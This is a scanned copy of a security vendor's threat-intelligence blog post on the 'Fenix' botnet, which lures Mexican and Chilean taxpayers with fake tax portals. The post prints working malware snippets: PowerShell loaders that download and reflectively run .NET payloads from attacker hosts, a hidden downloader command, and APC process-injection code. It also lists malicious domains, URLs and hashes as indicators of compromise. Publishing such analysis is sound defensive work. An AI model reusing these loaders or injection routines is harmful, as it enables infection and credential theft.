www.metabaseq.com Open in urlscan Pro
159.65.97.158  Public Scan

Submitted URL: http://metabaseq.com/fenix-botnet/
Effective URL: https://www.metabaseq.com/fenix-botnet/
Submission: On July 27 via api from DE — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

Este sitio web almacena cookies en tu PC, las cuales se utilizan para recopilar
información acerca de tu interacción con nuestro sitio web y nos permite
recordarte. Usamos esta información con el fin de mejorar y personalizar tu
experiencia de navegación y para generar analíticas y métricas acerca de
nuestros visitantes en este sitio web y otros medios de comunicación. Para
conocer más acerca de las cookies, consulta nuestra política de privacidad.

Si rechazas, no se hará seguimiento de tu información cuando visites este sitio
web. Se usará una sola cookie en tu navegador para recordar tu preferencia de
que no se te haga seguimiento.

Configuración de las cookies
Aceptar todas Rechazar todas
Skip to content
 * SOLUTIONS
   
    * SOLUTIONS
    * OFFENSIVE SERVICES
    * DEFENSIVE SERVICES
    * BATUTA PLATFORM
    * CLOUD SERVICES

 * HOW IT WORKS
   
    * HOW IT WORKS
    * OUR CAPABILITIES
    * PRICING

 * WHY METABASE Q
   
    * WHY METABASE Q
    * OUR EXPERTS
    * INSTITUTIONAL AFFAIRS

 * COMPANY
   
    * ABOUT US
    * CERC
    * DIGITAL CYBER ACADEMY
    * CYBERSECURITY EXECUTIVE PROGRAM
    * CYBERSECURITY FOR SMBS
    * FUTURE COMMUNITY
    * CAREERS

 * RESOURCES

 * ES

CONTACT US
 * SOLUTIONS
   
    * SOLUTIONS
    * OFFENSIVE SERVICES
    * DEFENSIVE SERVICES
    * BATUTA PLATFORM
    * CLOUD SERVICES

 * HOW IT WORKS
   
    * HOW IT WORKS
    * OUR CAPABILITIES
    * PRICING

 * WHY METABASE Q
   
    * WHY METABASE Q
    * OUR EXPERTS
    * INSTITUTIONAL AFFAIRS

 * COMPANY
   
    * ABOUT US
    * CERC
    * DIGITAL CYBER ACADEMY
    * CYBERSECURITY EXECUTIVE PROGRAM
    * CYBERSECURITY FOR SMBS
    * FUTURE COMMUNITY
    * CAREERS

 * RESOURCES

 * ES

CONTACT US
CONTACT US
 * ES

 * 



CONTACT US
 * ES

 * 





BOTNET FENIX: NEW BOTNET GOING AFTER TAX PAYERS IN MEXICO AND CHILE

/ All, Threats / By Metabase Q Team

By Gerardo Corona & Julio Vidal Ocelot Team


CONTEXT

Ransomware gangs have found a profitable market in LATAM, but they are not
alone, they need region-based actors to provide them the initial access to the
companies. These local groups create phishing campaigns based on the government
activities during the year, like Tax season, testament month, Buen Fin (Black
Friday), and so on, once they gain access, Lockbit, Medusa, Darkside, etc, take
over to complete the mission.

The Threat Intelligence team at Metabase Q has recently uncovered a local group
that created a new botnet self-proclaimed as “Fenix,” which specifically targets
users accessing government services, particularly tax-paying individuals in
Mexico and Chile. This botnet takes advantage of the tax season in both
countries, which occurred last April. In their malicious campaign, the attackers
redirect victims to fraudulent websites that mimic the official portals of the
Servicio de Administración Tributaria (SAT) in Mexico and the Servicio de
Impuestos Internos (SII) in Chile. These fake websites prompt users to download
a supposed security tool, claiming it will enhance their portal navigation
safety. However, unbeknownst to the victims, this download actually installs the
initial stage of malware, ultimately enabling the theft of sensitive information
such as credentials.


Figure 1: Fake Tax Portal from Mexico

The purpose of this blog is to share indicators of compromise with the community
to help implement proactive measures to mitigate this emerging threat.


IMPACT

While we have evidence that the actor has been active since Q4 2022, we have
listed the most recent campaigns and target institutions below were the main
motivation is to install an infostealer to grab credentials of users accessing
these sites:

Campaign Date Landing page Target Entity & Country 2023-02-02
citas-sregob-mexico[.]com Secretaria de Relaciones Exteriores – México
2023-02-02 sre-curpmexico[.]com Secretaria de Relaciones Exteriores – México
2023-02-02 citas-sat2023[.]com.mx Servicio de Administración Tributaria (SAT) –
México 2023-02-08 mexico-curp[.]com Secretaria de Relaciones Exteriores – México
2023-03-04 whatsapp.website Public in general 2023-03-17 annydesk.website Public
in general 2023-03-17 tramites-sat[.]com.mx Secretaria de Relaciones Exteriores
– México 2023-03-14 citasatmx2023[.]lat Servicio de Administración Tributaria
(SAT) – México 2023-03-14 2repuvegobmx[.]com.mx Registro Público Vehicular
(REPUVE) – México 2023-03-16 citas-satmx[.]com Servicio de Administración
Tributaria (SAT) – México 2023-03-29 lbci-seguro[.]com Banco BCI – Chile
2023-04-13 siii-chile[.]com Servicio de Impuestos Internos (SII) – Chile
2023-04-15 consultacurp-gobmx[.]com.mx Secretaria de Relaciones Exteriores –
México


WHO IS THE ACTOR BEHIND THESE ATTACKS?

We can confirm with high confidence that the Fenix Botnet involves Mexican
developers. However, since this is an ongoing investigation, it is not possible
to reveal the full details of the actor yet. Some characteristics of the Fenix
actor are below:

 * It is focused on Mexico and Chile (to date)
 * It has a high level of familiarity with local government institutions in
   Latin America
 * It shares infrastructure with other actors in the region, probably the same
   provider
 * Its first activity seen started around the last quarter of 2022
 * Its main initial infection strategy is to fool the user to download a fake
   security tool
 * It uses HTTrack Website Copier/3.x to clone websites
 * It compromises weak websites using vulnerable WordPress engines and also
   creates new domains to launch phishing campaigns
 * It creates typosquatting domains similar to known apps like AnyDesk,
   WhatsApp, etc.
 * It uses open-source software for some of its components
 * It uses the following languages in payloads: JScript, Rust, Golang,
   Powershell & .NET


METABASE Q PROTECTION STRATEGY

At Metabase Q, we are focused on constantly updating our systems and protection
strategy for new attackers and techniques. Following this discovery, our team
and platform rapidly integrated the Botnet Fenix techniques into our Batuta
Platform for optimal detection and response:

 1. Threat Intelligence: Metabase Q Threat Intelligence team extracts Botnet
    Fenix techniques, indicators of compromise, and updates actor’s profiling
    database
    * Starts takedown process of malicious domains
 2. Crimeware Simulation: Ocelot team reverse engineers Fenix’s components,
    codes it from scratch in our lab, and adds it to our Batuta platform to
    replicate it and test it in our customers’ networks.
 3. Blue Team: The SOC team is trained with the latest techniques identified and
    hunting detections implemented for tracking.
 4. Security ValidationDetection Gaps identified, and Time to Detect & Response
    improved.

Figure 4. Batuta Platform

In the next section, a deep technical analysis will be documented for proactive
defensive strategies.


TECHNICAL ANALYSIS

The complexity of the multi-stage infection chain is shown below:



Figure 2: Infection Chain Overview

Let’s walk through the infection chain stages:

 1.  In the impersonated websites, a pop-up window appears suggesting the
     installation of an alleged security tool to safeguard data while browsing
     the portal.
     
     
     
     
     Figure 3: Fake Tax Portals from Chile & Mexico
     
     The initial lure can also be done via phishing sites to download
     “legitimate” software like Anydesk. The typo in the domain name:
     “annydesk[.]live” gives it away.
     
     
     Figure 4: Fake AnyDesk Portal

 2.  Clicking the button will redirect the user to a compromised website that
     hosts a ZIP file. Instructions are then provided to the victim to execute
     the downloaded file.
     
     
     
     
     Figure 5: Instructions for executing the downloaded file

 3.  Within the contents of the ZIP file (7631660BDCF74B95B5806328A7668CAB),
     there is a shortcut file (EAD09FAF971392FA16EACE20B6F68AEF) with a .url
     extension that contains code capable of downloading a JScript (JSE) file
     from an external site.
     
     
     
     
     Figure 6: .url file content

 4.  The JSE file (1BE0606640D645DDBFB2FBDFF53CA918) contains obfuscated code to
     make it more difficult to analyze.
     
     
     
     
     
     Figure 7: JSE file content obfuscated
     
     After deobfuscating and making the relevant substitutions, the following
     code is obtained:
     
     
     Figure 8: JSE file content deobfuscated
     
     This code downloads a Powershell script to disk and executes it.

 5.  The downloaded PowerShell script (D80F1780BB24E7ECDAB8A262744BCCB7) loads a
     .NET binary in memory and executes it (see step 6), then it displays the
     message: “Ahora se encuentra protegido” meaning: “Now you are protected.”
     pretending to show that the security tools were successful.
     
     $bytes = (Invoke-WebRequest """https://fja.com.mx/wp-contents/init.php?id=1""" -UseBasicParsing).Content;
                 $assembly = [System.Reflection.Assembly]::Load($bytes);
                 $entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq """Program""" }, """First""").GetMethod("""Main""", 
                 [Reflection.BindingFlags] """Static, Public, NonPublic""");
                 $entryPointMethod.Invoke($null, $null);
                 Add-Type -AssemblyName System.Windows.Forms;
                 [System.Windows.Forms.MessageBox]::Show('Ahora se encuentra protegido.','Informacion','OK','Information');
     
     
     Figure 9: Fake Security Tool code

 6.  The downloaded .NET file comes with the extension .xls and is executed from
     memory via reflection (B262B36C3B09EBEAB66C95E121BE4C73).The Windows binary
     AuthHost.exe is started in suspended mode and then a shellcode is injected
     into it. It is then triggered via QueueUserAPC call. Effectively this
     results in each thread getting its own APC queue; when the thread gets into
     alertable state, it will dequeue and execute the callback function which
     points to the malicious shellcode.
     
                 STARTUPINFO lpStartupInfo = default(STARTUPINFO);
     
                 PROCESS_INFORMATION lpProcessInformation = default(PROCESS_INFORMATION);
     
                 if (!CreateProcess("C:\\Windows\\System32\\AuthHost.exe", null, IntPtr.Zero, IntPtr.Zero, bInheritHandles: false, ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref lpStartupInfo, out lpProcessInformation))
                 {
                 Console.WriteLine("CreateProcess failed: {0}", Marshal.GetLastWin32Error());
                 return;
                 }
                 IntPtr hProcess = lpProcessInformation.hProcess;
     
                 IntPtr hThread = lpProcessInformation.hThread;
     
                 IntPtr intPtr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)array.Length, AllocationType.MEM_COMMIT, MemoryProtection.PAGE_EXECUTE_READWRITE);
     
                 WriteProcessMemory(hProcess, intPtr, array, (uint)array.Length, IntPtr.Zero);
     
                 QueueUserAPC(intPtr, hThread, IntPtr.Zero);
     
                 ResumeThread(hThread);
     
     
     Figure 10. Content of 7684jasdtg.xls

 7.  The shellcode mainly executes two tasks:
     a. Downloads to disk a PowerShell that is added to the registry to gain
        persistence. The script will connect to russiancl[.]top and download the
        file “pay.txt” which is the file 7684jasdtg.xls
     b. Enable a proxy in the registry to intercept web traffic, then, later at
        step 8, another component will download the proxy.crypt module to
        implement the functionality.
     
      
     
     powershell -WindowStyle hidden "&{Start-Sleep 5;$bytes = (Invoke-WebRequest 'https://russiancl.top/bramx/pay.txt' -UseBasicParsing).Content; powershell $bytes }";
     
     Figure 11. Powershell Downloader
     
     Below is the content of “pay.txt” file which as mentioned above, is the
     7684jasdtg.xls .NET assembly already described.
     
                 $bytes = (Invoke-WebRequest """https://russiancl.top/bramx/7684jasdtg.xls""" -UseBasicParsing).Content;
                 
                 $assembly = [System.Reflection.Assembly]::Load($bytes);
                 
                 $entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq """Program""" }, """First""").GetMethod("""Main""", [Reflection.BindingFlags] """Static, Public, NonPublic""");
                 
                 $entryPointMethod.Invoke($null, $null);
     
     
     Figure 12. Content of pay.txt Powershell

 8.  The shellcode injected into the AuthHost.exe process downloads a XORed
     payload ot.crypt. Then it reads information from
     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
     Manager\Environment and generates a POST request along with machine
     information to register with the botnet at russiancl[.]top/bramx/post.php:
     
     Figure 13. POST request to register with the botnet
     
     After the system registers with the botnet, the ot.crypt component starts
     in a loop and performs the following actions:
     
     * Load proxy.crypt to start an infinite loop to make it persistent
     * Ask botnet for tasks to execute
     * Download and execute the received tasks
     * Inject new DLLs via reflective method
     * Load another module calls: stealer.crypt
     * Send results back to the botnet
     * Delete itself:
     
     Figure 14: Instruction the bot to delete itself

 9.  Then two additional modules are downloaded: proxy.crypt and steal.crypt.
     The proxy module injects its own private key and certificate to perform a
     MITM attack against HTTPS. It is implemented based on a Golang-based
     Goproxy open-source project:
     https://github.com/elazarl/goproxy
 10. Finally, the steal.crypt component is loaded via DLL reflective technique,
     acts as a classic info Stealer grabbing credentials from different browsers
     including Chrome, Opera and Edge as well as from crypto wallets.


CONCLUSIONS

We are seeing new malicious groups being created in LATAM to provide initial
access to Ransomware gangs, as detailed in this blog, these local actors are not
amateur and will increase their technical expertise and therefore more difficult
to track, detect and eradicate, it is important to anticipate their actions. The
Threat Intelligence team at Metabase Q, tracks these emerging threats, monitors
their movements, takedown their infrastructure, understands their motivations,
shares real time indicators of compromise, and provides the latest techniques to
our customers to protect them proactively.


ATT&CK



Figure 15: Botnet Fenix TTP


IOCS FOUND


HASHES:

B10B9F1F286F7AE29D9E87C5391D3653

500B1C312163009FEFEC3F8FE7861258

594804AA21887EE9D7B1B888F482D60C

1C50C6D0AEAF8071F528B76B1AB242FE

 

D80F1780BB24E7ECDAB8A262744BCCB7

1BE0606640D645DDBFB2FBDFF53CA918

7631660BDCF74B95B5806328A7668CAB

EAFF13D6C89CE0E2A7632BD811045C35

EA68E0CC90A88315526704BAE1CA8B4A

B262B36C3B09EBEAB66C95E121BE4C73

6F0B4018DA4AA0887B5AA879CE315543

7FE97D4E29E17F39E343A9EF5FDE03CA

 


URL:

file[:]\\139[.]162[.]73[.]58@80\SuECWRPQ\SAT_Herramienta_Seguridad[.]jse
file[:]\\139[.]162[.]73[.]58@80\YtmpEoBw\Herramienta_de_Seguridad_SII[.]jse
hxxps[:]//fja[.]com[.]mx/wp-contents/execution[.]php?tag=russian
hxxps[:]//fja[.]com[.]mx/wp-contents/init[.]php?id=1
hxxps[:]//www[.]grafoce[.]com/scripts/index[.]php?id=2
hxxps[:]//www[.]grafoce[.]com/wp-contents/execution[.]php?tag=russian
hxxps[:]//russiancl[.]top/bramx/7684jasdtg[.]xls
hxxps[:]//russiancl[.]top/bramx/post[.]php
hxxps[:]//russiancl[.]top/bramx/ot[.]crypt
hxxps[:]//russiancl[.]top/bramx/proxy[.]crypt
hxxps[:]//russiancl[.]top/bramx/steal[.]crypt

 


DOMAIN:

2repuvegobmx[.]com.mx
annydesk.website
citasatmx2023[.]lat
citas-sat2023[.]com.mx
citas-satmx[.]com
citas-sregob-mexico[.]com
consultacurp-gobmx[.]com.mx
consultacurp-gobmx[.]com[.]mx
fja[.]com[.]mx
grafoce[.]com
lbci-seguro[.]com
mexico-curp[.]com
russiancl[.]top
siii-chile[.]com
sre-curpmexico[.]com
tramites-sat[.]com.mx
whatsapp.website

 


IP ADDRESS:

207.210.228[.]67
139.162.73[.]58
80.66.64[.]154

 


FILENAMES:

SII_Seguro_XXXXXX.zip
Herramienta Seguridad SII.url
AT_herramienta_XXXXXX.zip
SAT_Herramienta_Seguridad.jse
b262b36c3b09ebeab66c95e121be4c73      7684jasdtg.xls

B10B9F1F286F7AE29D9E87C5391D3653  ot.crypt

500B1C312163009FEFEC3F8FE7861258  proxy.crypt

594804AA21887EE9D7B1B888F482D60C  steal.crypt

1C50C6D0AEAF8071F528B76B1AB242FE  pay.txt

Post navigation
← Previous Post

Metabase Q is the leading end-to-end cybersecurity company focused on Latin
America. We help your business get and stay secure through an integrated
platform suite of offensive and defensive services and technologies


GLOBAL HEADQUARTERS

2193 Fillmore St. San Francisco, CA 94115

 * +52 55 2211 0920

 * +52 55 2211 0920




COMPANY

 * contact us
 * careers
 * Institutional Affairs
 * CERC
 * Digital Cyber Academy
 * Future Community


RESOURCES

 * Blog
 * Events + Webinars
 * Threat Research
 * Ebooks


SOLUTIONS

 * Offensive Services
 * Defensive Services
 * Batuta Platform
 * Cloud Services
 * pricing

Privacy Policy © 2023 Metabase Q. All rights reserved.